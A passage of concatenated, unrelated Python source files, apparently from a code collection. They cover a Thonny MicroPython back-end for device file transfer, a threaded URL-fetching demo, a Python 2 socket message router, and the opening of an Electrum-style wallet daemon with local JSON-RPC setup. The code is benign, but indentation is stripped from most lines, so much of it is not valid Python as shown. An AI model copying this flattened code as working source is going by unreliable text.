dedent(
"""
__thonny_fp.close()
del __thonny_fp
try:
del __temp_hexlify
except:
pass
"""
)
)
def _write_file(self, content_blocks, target_path, notifier=None):
try:
result = self._write_file_via_serial(content_blocks, target_path, notifier)
except ReadOnlyFilesystemError:
result = self._write_file_via_mount(content_blocks, target_path, notifier)
self._sync_all_filesystems()
return result
def _write_file_via_mount(self, content_blocks, target_path, notifier=None):
mounted_target_path = self._internal_path_to_mounted_path(target_path)
with open(mounted_target_path, "wb") as f:
bytes_written = 0
for block in content_blocks:
bytes_written += f.write(block)
f.flush()
os.fsync(f)
if notifier is not None:
notifier(bytes_written)
return bytes_written
def _write_file_via_serial(self, content_blocks, target_path, notifier=None):
# prelude
result = self._evaluate(
"__thonny_result",
dedent(
"""
try:
__thonny_path = '{path}'
__thonny_written = 0
__thonny_fp = open(__thonny_path, 'wb')
__thonny_result = "OK"
except Exception as e:
__thonny_result = str(e)
"""
).format(path=target_path),
)
if "readonly" in result.replace("-", "").lower():
raise ReadOnlyFilesystemError()
elif result != "OK":
raise RuntimeError("Problem opening file for writing: " + result)
# Define function to allow shorter write commands
hex_mode = self.should_hexlify(target_path)
if hex_mode:
self._execute_without_errors(
dedent(
"""
from binascii import unhexlify as __thonny_unhex
def __W(x):
global __thonny_written
__thonny_written += __thonny_fp.write(__thonny_unhex(x))
__thonny_fp.flush()
"""
)
)
else:
self._execute_without_errors(
dedent(
"""
def __W(x):
global __thonny_written
__thonny_written += __thonny_fp.write(x)
"""
)
)
bytes_sent = 0
for block in content_blocks:
if hex_mode:
script = "__W(%r)" % binascii.hexlify(block)
else:
script = "__W(%r)" % block
self._execute_without_errors(script)
print("Wrote", script)
bytes_sent += len(block)
if notifier is not None:
notifier(bytes_sent)
bytes_received = self._evaluate("__thonny_written")
if bytes_received != bytes_sent:
raise UserError("Expected %d written bytes but wrote %d" % (bytes_sent, bytes_received))
# clean up
self._execute_without_errors(
dedent(
"""
try:
del __W
del __thonny_written
del __thonny_path
__thonny_fp.close()
del __thonny_fp
del __thonny_result
del __thonny_unhex
except:
pass
"""
)
)
return bytes_sent
def _sync_all_filesystems(self):
self._execute_without_errors(
dedent(
"""
try:
from os import sync as __thonny_sync
__thonny_sync()
del __thonny_sync
except ImportError:
pass
"""
)
)
def _list_local_files_with_info(self, paths):
def rec_list_with_size(path):
result = {}
if os.path.isfile(path):
result[path] = os.path.getsize(path)
elif os.path.isdir(path):
for name in os.listdir(path):
result.update(rec_list_with_size(os.path.join(path, name)))
else:
raise RuntimeError("Can't process " + path)
return result
result = []
for requested_path in paths:
sizes = rec_list_with_size(requested_path)
for path in sizes:
result.append(
{
"path": path,
"size": sizes[path],
"original_context": os.path.dirname(requested_path),
}
)
result.sort(key=lambda rec: rec["path"])
return result
def _list_remote_files_with_info(self, paths):
# prepare universal functions
self._execute_without_errors(
dedent(
"""
try:
import os as __thonny_os
from os import stat as __thonny_stat
def __thonny_getsize(path):
return __thonny_stat(path)[6]
def __thonny_isdir(path):
return __thonny_stat(path)[0] & 0o170000 == 0o040000
except ImportError:
__thonny_stat = None
# micro:bit
from os import size as __thonny_getsize
def __thonny_isdir(path):
return False
"""
)
)
self._execute_without_errors(
dedent(
"""
def __thonny_rec_list_with_size(path):
result = {}
if __thonny_isdir(path):
for name in __thonny_os.listdir(path):
result.update(__thonny_rec_list_with_size(path + "/" + name))
else:
result[path] = __thonny_getsize(path)
return result
"""
)
)
result = []
for requested_path in paths:
sizes = self._evaluate("__thonny_rec_list_with_size(%r)" % requested_path)
for path in sizes:
result.append(
{
"path": path,
"size": sizes[path],
"original_context": os.path.dirname(requested_path),
}
)
result.sort(key=lambda rec: rec["path"])
self._execute_without_errors(
dedent(
"""
del __thonny_os
del __thonny_stat
del __thonny_getsize
del __thonny_isdir
del __thonny_rec_list_with_size
"""
)
)
return result
def _get_existing_remote_files(self, paths):
if self._supports_directories():
func = "stat"
else:
func = "size"
return self._evaluate(
"__thonny_result",
prelude=dedent(
"""
import os as __thonny_os
__thonny_result = []
for __thonny_path in %r:
try:
__thonny_os.%s(__thonny_path)
__thonny_result.append(__thonny_path)
except OSError:
pass
"""
)
% (paths, func),
cleanup=dedent(
"""
del __thonny_os
del __thonny_result
del __thonny_path
"""
),
)
def _join_remote_path_parts(self, left, right):
if left == "": # micro:bit
assert not self._supports_directories()
return right.strip("/")
return left.rstrip("/") + "/" + right.strip("/")
def _get_file_size(self, path):
if self._supports_directories():
script = "__thonny_os.stat(%r)[6]"
else:
script = "os.stat(%r)[6]"
return self._evaluate(script % path, prelude="import os as __thonny_os")
def _makedirs(self, path):
if path == "/":
return
try:
self._makedirs_via_serial(path)
except Exception as e:
if "read-only" in str(e).lower():
self._makedirs_via_mount(path)
def _makedirs_via_mount(self, path):
mounted_path = self._internal_path_to_mounted_path(path)
assert mounted_path is not None, "Couldn't find mounted path for " + path
os.makedirs(mounted_path, exist_ok=True)
def _makedirs_via_serial(self, path):
if path == "/":
return
path = path.rstrip("/")
script = (
dedent(
"""
import os as __thonny_os
__thonny_parts = %r.split('/')
for i in range(2, len(__thonny_parts) + 1):
__thonny_path = "/".join(__thonny_parts[:i])
try:
__thonny_os.stat(__thonny_path)
except OSError:
# does not exist
__thonny_os.mkdir(__thonny_path)
del __thonny_parts
try:
del __thonny_path
except:
pass
"""
)
% path
)
self._execute_without_errors(script)
def _delete_via_mount(self, paths):
for path in paths:
mounted_path = self._internal_path_to_mounted_path(path)
assert mounted_path is not None
shutil.rmtree(mounted_path)
def _delete_via_serial(self, paths):
if not self._supports_directories():
self._execute_without_errors(
dedent(
"""
import os as __thonny_os
for __thonny_path in %r:
__thonny_os.remove(__thonny_path)
del __thonny_path
del __thonny_os
"""
)
% paths
)
else:
self._execute_without_errors(
dedent(
"""
import os as __thonny_os
def __thonny_delete(path):
if __thonny_os.stat(path)[0] & 0o170000 == 0o040000:
for name in __thonny_os.listdir(path):
child_path = path + "/" + name
__thonny_delete(child_path)
__thonny_os.rmdir(path)
else:
__thonny_os.remove(path)
for __thonny_path in %r:
__thonny_delete(__thonny_path)
del __thonny_path
del __thonny_delete
del __thonny_os
"""
)
% paths
)
def _upload_file(self, source, target, notifier):
assert target.startswith("/") or not self._supports_directories()
target_dir, _ = linux_dirname_basename(target)
assert target_dir.startswith("/") or not self._supports_directories()
self._makedirs(target_dir)
def block_generator():
with open(source, "rb") as source_fp:
while True:
block = source_fp.read(512)
if block:
yield block
else:
break
return self._write_file(block_generator(), target, notifier=notifier)
def _download_file(self, source, target, notifier=None):
os.makedirs(os.path.dirname(target), exist_ok=True)
bytes_written = 0
with open(target, "wb") as out_fp:
for block in self._read_file(source):
out_fp.write(block)
os.fsync(out_fp)
bytes_written += len(block)
                if notifier is not None:
                    notifier(bytes_written)
return bytes_written
def _get_fs_mount_label(self):
# This method is most likely required with CircuitPython,
# so try its approach first
# https://learn.adafruit.com/welcome-to-circuitpython/the-circuitpy-drive
result = self._evaluate(
"__thonny_result",
prelude=dedent(
"""
try:
from storage import getmount as __thonny_getmount
try:
__thonny_result = __thonny_getmount("/").label
finally:
del __thonny_getmount
except ImportError:
__thonny_result = None
except OSError:
__thonny_result = None
"""
),
cleanup="del __thonny_result",
)
if result is not None:
return result
if self._welcome_text is None:
return None
"""
# following is not reliable and probably not needed
markers_by_name = {"PYBFLASH": {"pyb"}, "CIRCUITPY": {"circuitpython"}}
for name in markers_by_name:
for marker in markers_by_name[name]:
if marker.lower() in self._welcome_text.lower():
return name
"""
return None
def _get_flash_prefix(self):
if not self._supports_directories():
return ""
elif (
"LoBo" in self._welcome_text
or "WiPy with ESP32" in self._welcome_text
or "PYBLITE" in self._welcome_text
or "PYBv" in self._welcome_text
or "PYBOARD" in self._welcome_text.upper()
):
return "/flash/"
else:
return "/"
def _get_fs_mount(self):
label = self._get_fs_mount_label()
if label is None:
return None
else:
candidates = find_volumes_by_name(
self._get_fs_mount_label(),
# querying A can be very slow
skip_letters="A",
)
if len(candidates) == 0:
raise RuntimeError("Could not find volume " + self._get_fs_mount_label())
elif len(candidates) > 1:
raise RuntimeError("Found several possible mount points: %s" % candidates)
else:
return candidates[0]
def _get_fs_info(self, path):
result = self._evaluate(
dedent(
"""{
"total" : __thonny_total,
"used" : __thonny_used,
"free": __thonny_free,
"sizes": __thonny_sizes
}"""
),
prelude=dedent(
"""
try:
from os import statvfs as __thonny_statvfs
__thonny_stat = __thonny_statvfs(%r)
__thonny_total = __thonny_stat[2] * __thonny_stat[0]
__thonny_free = __thonny_stat[3] * __thonny_stat[0]
__thonny_used = __thonny_total - __thonny_free
__thonny_sizes = None
del __thonny_statvfs
del __thonny_stat
except ImportError:
import os as __thonny_os
__thonny_sizes = [__thonny_os.size(name) for name in __thonny_os.listdir()]
__thonny_used = None
__thonny_total = None
__thonny_free = None
del __thonny_os
"""
)
% path,
cleanup=dedent(
"""
del __thonny_total
del __thonny_free
del __thonny_used
del __thonny_sizes
"""
),
)
if result["sizes"] is not None:
if self._connected_to_microbit():
comment = "Assuming around 30 kB of storage space for user files."
else:
comment = "Don't know the size of storage space on this device."
files_total_size = sum(result["sizes"])
# TODO: compute number of used blocks
if files_total_size > 0:
comment += "\n\n" + "At least %s of it is used by %d file(s)." % (
sizeof_fmt(files_total_size),
len(result["sizes"]),
)
result["comment"] = comment
del result["sizes"]
return result
def _get_microbit_file_sizes(self):
return self._evaluate(
"{name : __thonny_os.size(name) for name in __thonny_os.listdir()}",
prelude="import os as __thonny_os",
cleanup="del __thonny_os",
)
def _get_dirs_child_data_generic(self, paths):
return self._evaluate(
"__thonny_result",
prelude=dedent(
"""
import os as __thonny_os
# Init all vars, so that they can be deleted
# even if the loop makes no iterations
__thonny_result = {}
__thonny_path = None
__thonny_st = None
__thonny_child_names = None
__thonny_children = None
__thonny_name = None
__thonny_real_path = None
__thonny_full = None
for __thonny_path in %(paths)r:
__thonny_real_path = __thonny_path or '/'
try:
__thonny_child_names = __thonny_os.listdir(__thonny_real_path)
except OSError:
# probably deleted directory
__thonny_children = None
else:
__thonny_children = {}
for __thonny_name in __thonny_child_names:
if __thonny_name.startswith('.') or __thonny_name == "System Volume Information":
continue
__thonny_full = (__thonny_real_path + '/' + __thonny_name).replace("//", "/")
try:
__thonny_st = __thonny_os.stat(__thonny_full)
if __thonny_st[0] & 0o170000 == 0o040000:
# directory
__thonny_children[__thonny_name] = {"kind" : "dir", "size" : None}
else:
__thonny_children[__thonny_name] = {"kind" : "file", "size" :__thonny_st[6]}
# converting from 2000-01-01 epoch to Unix epoch
__thonny_children[__thonny_name]["time"] = max(__thonny_st[8], __thonny_st[9]) + 946684800
except OverflowError:
# Probably "System Volume Information" in trinket
# https://github.com/thonny/thonny/issues/923
pass
__thonny_result[__thonny_path] = __thonny_children
"""
)
% {"paths": paths},
cleanup=dedent(
"""
del __thonny_os
del __thonny_st
del __thonny_children
del __thonny_name
del __thonny_path
del __thonny_full
del __thonny_result
del __thonny_real_path
"""
),
)
def _check_for_connection_errors(self):
self._connection._check_for_error()
def _on_connection_closed(self, error=None):
message = "Connection lost"
if error:
message += " (" + str(error) + ")"
self._send_output("\n" + message + "\n", "stderr")
self._send_output("\n" + "Use Stop/Restart to reconnect." + "\n", "stderr")
sys.exit(EXPECTED_TERMINATION_CODE)
def _show_error(self, msg):
self._send_output(msg + "\n", "stderr")
def should_hexlify(self, path):
if "binascii" not in self._builtin_modules:
return False
for ext in (".py", ".txt", ".csv"):
if path.lower().endswith(ext):
return False
return True
class ProtocolError(Exception):
def __init__(self, message, captured):
Exception.__init__(self, message)
self.message = message
self.captured = captured
class ExecutionError(Exception):
pass
def _report_internal_error():
print("PROBLEM WITH THONNY'S BACK-END:\n", file=sys.stderr)
traceback.print_exc()
def ends_overlap(left, right):
"""Returns whether the left ends with one of the non-empty prefixes of the right"""
for i in range(1, min(len(left), len(right)) + 1):
if left.endswith(right[:i]):
return True
return False
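# Illustrative calls (not part of the original source), e.g. for detecting a
# marker that may be split across two reads:
#   ends_overlap("hello >>", ">>> ")   # True  -- "hello >>" ends with ">>"
#   ends_overlap("hello", "OK\r\n")    # False -- no prefix of "OK\r\n" matches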
def parse_api_information(file_path):
with tokenize.open(file_path) as fp:
source = fp.read()
tree = ast.parse(source)
defs = {}
# TODO: read also docstrings ?
for toplevel_item in tree.body:
if isinstance(toplevel_item, ast.ClassDef):
class_name = toplevel_item.name
member_names = []
for item in toplevel_item.body:
if isinstance(item, ast.FunctionDef):
member_names.append(item.name)
elif isinstance(item, ast.Assign):
# TODO: check Python 3.4
"TODO: item.targets[0].id"
defs[class_name] = member_names
return defs
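# A sketch of the expected output shape (hypothetical stub content): for a stub
# file containing
#
#     class Pin:
#         def __init__(self): pass
#         def value(self): pass
#
# the function would return {"Pin": ["__init__", "value"]}.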
def linux_dirname_basename(path):
if path == "/":
return ("/", "")
if "/" not in path: # micro:bit
return "", path
path = path.rstrip("/")
dir_, file_ = path.rsplit("/", maxsplit=1)
if dir_ == "":
dir_ = "/"
return dir_, file_
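# Illustrative behaviour (not part of the original source):
#   linux_dirname_basename("/flash/main.py")  # ("/flash", "main.py")
#   linux_dirname_basename("/main.py")        # ("/", "main.py")
#   linux_dirname_basename("main.py")         # ("", "main.py")  -- micro:bit style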
def to_remote_path(path):
return path.replace("\\", "/")
class ReadOnlyFilesystemError(RuntimeError):
pass
if __name__ == "__main__":
THONNY_USER_DIR = os.environ["THONNY_USER_DIR"]
logger = logging.getLogger("thonny.micropython.backend")
logger.propagate = False
logFormatter = logging.Formatter("%(levelname)s: %(message)s")
file_handler = logging.FileHandler(
os.path.join(THONNY_USER_DIR, "micropython-backend.log"), encoding="UTF-8", mode="w"
)
file_handler.setFormatter(logFormatter)
file_handler.setLevel(logging.INFO)
logger.addHandler(file_handler)
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("--clean", type=lambda s: True if s == "True" else False)
parser.add_argument("--port", type=str)
parser.add_argument("--url", type=str)
parser.add_argument("--password", type=str)
parser.add_argument("--api_stubs_path", type=str)
parser.add_argument("--min_write_delay", type=float, default=0.01)
args = parser.parse_args()
port = None if args.port == "None" else args.port
try:
if port is None:
# remain busy
while True:
time.sleep(1000)
elif port == "webrepl":
from thonny.plugins.micropython.webrepl_connection import WebReplConnection
connection = WebReplConnection(args.url, args.password, args.min_write_delay)
else:
from thonny.plugins.micropython.serial_connection import SerialConnection
from thonny.plugins.micropython.serial_connection import DifficultSerialConnection
connection = SerialConnection(port, BAUDRATE)
# connection = DifficultSerialConnection(port, BAUDRATE)
vm = MicroPythonBackend(connection, clean=args.clean, api_stubs_path=args.api_stubs_path)
except ConnectionFailedException as e:
text = "\n" + str(e) + "\n"
msg = BackendEvent(event_type="ProgramOutput", stream_name="stderr", data=text)
sys.stdout.write(serialize_message(msg) + "\n")
sys.stdout.flush()
|
multithreading.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Jul 1 00:21:21 2018
@author: arthur
"""
from queue import Queue
from threading import Thread
from urllib.request import urlopen
import logging
import random
import numpy as np
#
#
def encoder():
leitura = random.randint(0,50)
print("Encoder: " + str(leitura) + " km/h")
def ultrassom():
for i in range(0,50):
leitura_ultra = random.randint(0,50)
leitura = np.median(leitura_ultra)
print("Ultrassom: " + str(leitura) + " m")
def gps():
for i in range(0,50):
leitura_ultra = random.randint(0,50)
leitura = np.median(leitura_ultra)
print("GPS lat: " + str(leitura) + " ")
print("GPS long: " + str(leitura) + " ")
# Threaded function for queue processing.
def crawl(q, result):
while not q.empty():
work = q.get() #fetch new work from the Queue
try:
data = urlopen(work[1]).read()
logging.info("Requested..." + work[1])
result[work[0]] = data #Store data back at correct index
except:
logging.error('Error with URL check!')
result[work[0]] = {}
#signal to the queue that task has been processed
q.task_done()
return True
leitura_ultra = []
# 'urls' is not defined in the original snippet; a small placeholder list
# (hypothetical addresses) is assumed here so the example can run.
urls = ["http://example.com/a", "http://example.com/b"]
# Set up the queue to hold all the urls.
q = Queue(maxsize=0)
# Use many threads (50 max, or one for each url).
num_threads = min(50, len(urls))
# Populate results with one placeholder dict per url.
results = [{} for x in urls]
#load up the queue with the urls to fetch and the index for each job (as a tuple):
for i in range(len(urls)):
#need the index and the url in each queue item.
q.put((i,urls[i]))
for i in range(num_threads):
    logging.debug('Starting thread %d', i)
    worker = Thread(target=crawl, args=(q, results))
    # Daemon threads let the main program exit eventually
    # even if these workers don't finish correctly.
    worker.daemon = True
    worker.start()
#now we wait until the queue has been processed
q.join()
logging.info('All tasks completed.')
|
thread_old.py
|
import pdb
pdb.set_trace()
import threading
def myfunc(i):
    print("sleeping 5 sec from thread %d" % i)
#for i in range(10):
t = threading.Thread(target=myfunc, args=(1,))
t.start()
|
route.py
|
#!/usr/bin/env python
"""Route messages between clients. \
Tested with Python 2.7.6"""
##### Imports #####
from threading import Thread
from sys import argv
from socket import (
socket, AF_INET,
SOCK_STREAM, SOL_SOCKET,
SHUT_RDWR,
SO_REUSEADDR, gethostname,
)
from argparse import (
ArgumentParser,
ArgumentDefaultsHelpFormatter
)
####################
#### (Magic) Defaults ####
ACCESS_ADDR = ''
PORT = 23456
BUFFSIZE = 2048
SIZE = 255
VERSION = '1.0'
##########################
####### Argument Parser #######
def parseargs(args):
verbose = "verbose output"
pars = ArgumentParser(
formatter_class=ArgumentDefaultsHelpFormatter,
fromfile_prefix_chars='<',
description=__doc__
)
pars.add_argument(
'PORT',
nargs = '?',
default=PORT,
help='The port number for the server',
type=int
)
pars.add_argument(
'-v','--verbose',
help=verbose,
action='store_true'
)
pars.add_argument(
'--version',
action='version',
version='%(prog)s ' + VERSION
)
pars.add_argument(
'--size',
type=int,
metavar='N',
choices=range(3,1023),
default=SIZE,
help="The maximum number N of clients to \
accept (2 < N < 1024).\
Note: one client is reserved."
)
pars.add_argument(
'--buffer', '-b',
type=int,
metavar='M',
choices=range(2048,10240),
default=BUFFSIZE,
help="The maximum size M of messages to \
accept (2048 < M < 10240)"
)
return pars.parse_args(args)
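# Example invocation (hypothetical values):
#   python route.py 23456 -v --size 100
# listens on port 23456 with verbose output; addresses 1-99 are handed out to
# clients and address 100 is reserved for broadcast/teardown requests.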
####################################################
# Create a server socket
def serversocket(port):
s = socket(AF_INET, SOCK_STREAM)
s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
s.bind((ACCESS_ADDR,port))
return s
# This class handles all routing
class ConnectionHandler:
# Constructor
def __init__(self, port = PORT, size = SIZE, verbose=False):
self.server = serversocket(port)
# Active connections
self.connections = {}
# Available addresses
self.free = {i for i in range(1, size)}
# Max addresses available
self.size = size
# Verbose output
self.verbose = verbose
### Boiler plate ###
def __repr__(self):
return str(self.connections)
def __str__(self):
return str(self.connections)
def __len__(self):
        return len(self.connections)
def __contains__(self, key):
return (key in self.connections)
def __getitem__(self, key):
return self.connections[key]
def __setitem__(self, key, value):
if key > 0 and key < self.size:
self.connections[key] = value
else:
raise KeyError
def __delitem__(self, key):
# Pop the connection and mark address available
self.free.add(key);
c = self.connections.pop(key, None)
if c is not None:
# Connection exists
if self.verbose:
print "Removed address " + str(key) + ": " + str(c)
try:
# Close the client
c[0].shutdown(SHUT_RDWR)
c[0].close()
except:
# Client is already closed
pass
def __missing__(self, key):
return None
# Broadcast a teardown and close the server
def __del__(self):
self.teardown()
self.server.close()
#####################
# Parse message into target and string
def __parse_msg__(self, msg):
mtuple = msg.split(":", 1)
try:
mtuple[0] = int(mtuple[0])
#mtuple[1] = mtuple[1].strip()
except ValueError:
return -1
if mtuple[0] not in self and mtuple[0] != self.size:
mtuple[1] = -1
return mtuple
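    # Illustrative message formats (not part of the original source), assuming
    # the default --size of 255:
    #   "7:hello"  -> forward "hello" to the client at address 7, prefixed with
    #                 the sender's address
    #   "7:0"      -> close the connection of the client at address 7
    #   "255:hi"   -> broadcast the message to every connected client
    #   "255:0"    -> tear down the router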
# Add a new client if possible
def add(self, client):
try:
# Get connection address
n = self.free.pop()
except KeyError:
# No addresses available
client[0].send("Sorry. The router is full :(\r\n")
client[0].close()
if self.verbose:
print "Error: connection rejected"
return
# Send address and add connection
client[0].send(str(n)+"\r\n")
self[n] = client
if self.verbose:
print "Client " + str(n) + " added: " + str(client)
# Route the client requests
t = Thread(target=self.route, args=(n,))
t.start()
# Receive and route messages from client at
# address n.
# Should be threaded to avoid blocking
def route(self, n):
part = ""
while 1:
try:
msgs = self.connections[n][0].recv(BUFFSIZE)
if not msgs:
break
msgs = msgs.split("\n")
msgs[0] = part + msgs[0]
if len(msgs) > 1:
part = msgs[-1]
msgs = msgs[0:-1]
for msg in msgs:
mtuple = self.__parse_msg__(msg)
# invalid message format
if mtuple == -1:
msg = "Error: invalid message \"" + msg + "\""
self.send(n, msg)
# address not found
elif mtuple[1] == -1:
msg = "Error: " + str(mtuple[0]) + " not found"
self.send(n, msg)
# No Errors
else:
if mtuple[1].strip() == '0':
# Teardown request
if mtuple[0] == self.size:
self.teardown()
return
# Close request
else:
del self[mtuple[0]]
if mtuple[0] == n: return
else:
# Broadcast request
if mtuple[0] == self.size:
self.broadcast(msg.strip())
# Message request
else:
msg = ": ".join([str(n), mtuple[1]])
self.send(mtuple[0], msg)
except:
# gracefully clean up upon any exceptions
break
del self[n]
# Handle broadcast requests
def broadcast(self, msg):
if self.verbose: print "Broadcasting " + msg
for key, connection in self.connections.iteritems():
if self.verbose: print "Sending to " + str(connection)
connection[0].send(msg + "\r\n")
# Send msg to client at address to
def send(self, to, msg):
if self.verbose:
print "Sending to " + str(to) + ": " + msg
self[to][0].send(msg + "\r\n")
# Perform teardowns
def teardown(self):
if self.verbose: print "Tearing down\r\n"
        for key in list(self.connections):
del self[key]
# Start listening and accepting clients
# callable instance
def __call__(self):
self.server.listen(5)
while 1:
try:
client = self.server.accept()
self.add(client)
except:
# oops
break
del self
def main():
# parse args
args = parseargs(argv[1:])
# Create connection handler
handle = ConnectionHandler(port=args.PORT,
size=args.size,
verbose=args.verbose)
# Accept connections
handle()
if __name__ == '__main__':
main()
|
daemon.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import ast
import base64
from typing import Any, cast, Dict, Optional, Tuple, Union
import os
import time
import jsonrpclib
from .restapi import AiohttpServer
from .app_state import app_state
from .commands import known_commands, Commands
from .exchange_rate import FxTask
from .jsonrpc import VerifyingJSONRPCServer
from .logs import logs
from .network import Network
from .simple_config import SimpleConfig
from .storage import WalletStorage
from .util import json_decode, DaemonThread, to_string, random_integer, get_wallet_name_from_path
from .version import PACKAGE_VERSION
from .wallet import Wallet
from .restapi_endpoints import DefaultEndpoints
logger = logs.get_logger("daemon")
def get_lockfile(config: SimpleConfig) -> str:
return os.path.join(config.path, 'daemon')
def remove_lockfile(lockfile: str) -> None:
logger.debug("removing lockfile")
try:
os.unlink(lockfile)
except OSError:
pass
def get_fd_or_server(config: SimpleConfig) -> Tuple[Optional[int], Optional[jsonrpclib.Server]]:
'''Tries to create the lockfile, using O_EXCL to
prevent races. If it succeeds it returns the FD.
Otherwise try and connect to the server specified in the lockfile.
If this succeeds, the server is returned. Otherwise remove the
lockfile and try again.'''
lockfile = get_lockfile(config)
while True:
try:
return os.open(lockfile, os.O_CREAT | os.O_EXCL | os.O_WRONLY, 0o644), None
except OSError:
pass
server = get_server(config)
if server is not None:
return None, server
# Couldn't connect; remove lockfile and try again.
remove_lockfile(lockfile)
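# Note: the lockfile written by Daemon.init_server() contains the repr of
# ((host, port), create_time), e.g. (('127.0.0.1', 8888), 1581234567.8)
# (example values), which get_server() parses back with ast.literal_eval.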
def get_server(config: SimpleConfig) -> Optional[jsonrpclib.Server]:
lockfile_path = get_lockfile(config)
while True:
create_time = None
server_url = None
try:
with open(lockfile_path) as f:
(host, port), create_time = ast.literal_eval(f.read())
rpc_user, rpc_password = get_rpc_credentials(config)
if rpc_password == '':
# authentication disabled
server_url = 'http://%s:%d' % (host, port)
else:
server_url = 'http://%s:%s@%s:%d' % (
rpc_user, rpc_password, host, port)
server = jsonrpclib.Server(server_url)
# Test daemon is running
server.ping()
return server
except ConnectionRefusedError:
logger.warning("get_server could not connect to the rpc server, is it running?")
except SyntaxError:
if os.path.getsize(lockfile_path):
logger.exception("RPC server lockfile exists, but is invalid")
else:
# Our caller 'get_fd_or_server' has created the empty file before we check.
logger.warning("get_server could not connect to the rpc server, is it running?")
except FileNotFoundError as e:
if lockfile_path == e.filename:
logger.info("attempt to connect to the RPC server failed")
else:
logger.exception("attempt to connect to the RPC server failed")
except Exception:
logger.exception("attempt to connect to the RPC server failed")
if not create_time or create_time < time.time() - 1.0:
return None
# Sleep a bit and try again; it might have just been started
time.sleep(1.0)
def get_rpc_credentials(config: SimpleConfig, is_restapi=False) \
-> Tuple[Optional[str], Optional[str]]:
rpc_user = config.get('rpcuser', None)
rpc_password = config.get('rpcpassword', None)
if rpc_user is None or rpc_password is None:
rpc_user = 'user'
nbits = 128
pw_int = random_integer(nbits)
pw_b64 = base64.b64encode(
pw_int.to_bytes(nbits // 8, 'big'), b'-_')
rpc_password = to_string(pw_b64, 'ascii')
config.set_key('rpcuser', rpc_user)
config.set_key('rpcpassword', rpc_password, save=True)
    elif rpc_password == '' and not is_restapi:
        logger.warning('No password set for RPC API. Access is therefore granted to all users.')
    elif rpc_password == '' and is_restapi:
        logger.warning('No password set for REST API. Access is therefore granted to all users.')
return rpc_user, rpc_password
class Daemon(DaemonThread):
rest_server: Optional[AiohttpServer]
cmd_runner: Commands
def __init__(self, fd, is_gui: bool) -> None:
super().__init__('daemon')
app_state.daemon = self
config = app_state.config
self.config = config
if config.get('offline'):
self.network = None
self.fx_task = None
app_state.read_headers()
else:
self.network = Network()
app_state.fx = FxTask(app_state.config, self.network)
self.fx_task = app_state.async_.spawn(app_state.fx.refresh_loop)
self.wallets: Dict[str, Wallet] = {}
# RPC API - (synchronous)
self.init_server(config, fd, is_gui)
# self.init_thread_watcher()
self.is_gui = is_gui
# REST API - (asynchronous)
self.rest_server = None
if app_state.config.get("restapi"):
self.init_restapi_server(config, fd)
self.configure_restapi_server()
def configure_restapi_server(self):
self.default_api = DefaultEndpoints()
self.rest_server.register_routes(self.default_api)
def init_restapi_server(self, config: SimpleConfig, fd) -> None:
host = config.get("rpchost", '127.0.0.1')
if os.environ.get('RESTAPI_HOST'):
host = os.environ.get('RESTAPI_HOST')
restapi_port = int(config.get('restapi_port', 9999))
if os.environ.get('RESTAPI_PORT'):
restapi_port = int(cast(str, os.environ.get('RESTAPI_PORT')))
username, password = get_rpc_credentials(config, is_restapi=True)
self.rest_server = AiohttpServer(host=host, port=restapi_port, username=username,
password=password)
def init_server(self, config: SimpleConfig, fd, is_gui: bool) -> None:
host = config.get('rpchost', '127.0.0.1')
port = config.get('rpcport', 8888)
rpc_user, rpc_password = get_rpc_credentials(config)
try:
server = VerifyingJSONRPCServer((host, port), logRequests=False,
rpc_user=rpc_user, rpc_password=rpc_password)
except Exception as e:
logger.error('Warning: cannot initialize RPC server on host %s %s', host, e)
self.server = None
os.close(fd)
return
os.write(fd, bytes(repr((server.socket.getsockname(), time.time())), 'utf8'))
os.close(fd)
self.server = server
server.timeout = 0.1
server.register_function(self.ping, 'ping')
server.register_function(self.run_gui, 'gui')
server.register_function(self.run_daemon, 'daemon')
server.register_function(self.run_cmdline, 'run_cmdline')
def init_thread_watcher(self) -> None:
import threading
import sys
import traceback
def _watcher():
while True:
for th in threading.enumerate():
th_text = str(th)
# if "GUI" not in th_text:
# continue
print(th)
traceback.print_stack(sys._current_frames()[th.ident])
print()
time.sleep(5.0)
t = threading.Thread(target=_watcher)
t.setDaemon(True)
t.start()
def ping(self) -> bool:
return True
def run_daemon(self, config_options: dict) -> Union[bool, str, Dict[str, Any]]:
config = SimpleConfig(config_options)
sub = config.get('subcommand')
assert sub in [None, 'start', 'stop', 'status', 'load_wallet', 'close_wallet']
response: Union[bool, str, Dict[str, Any]]
if sub in [None, 'start']:
response = "Daemon already running"
elif sub == 'load_wallet':
path = config.get_cmdline_wallet_filepath()
wallet = self.load_wallet(path) if path is not None else None
self.cmd_runner._wallet = wallet
response = True
elif sub == 'close_wallet':
cmdline_wallet_filepath = config.get_cmdline_wallet_filepath()
assert cmdline_wallet_filepath is not None
path = WalletStorage.canonical_path(cmdline_wallet_filepath)
if path in self.wallets:
self.stop_wallet_at_path(path)
response = True
else:
response = False
elif sub == 'status':
if self.network:
response = self.network.status()
response.update({
'fee_per_kb': self.config.fee_per_kb(),
'path': self.config.path,
'version': PACKAGE_VERSION,
'wallets': {k: w.is_synchronized() for k, w in self.wallets.items()},
})
else:
response = "Daemon offline"
elif sub == 'stop':
self.stop()
response = "Daemon stopped"
return response
def run_gui(self, config_options: dict) -> str:
config = SimpleConfig(config_options)
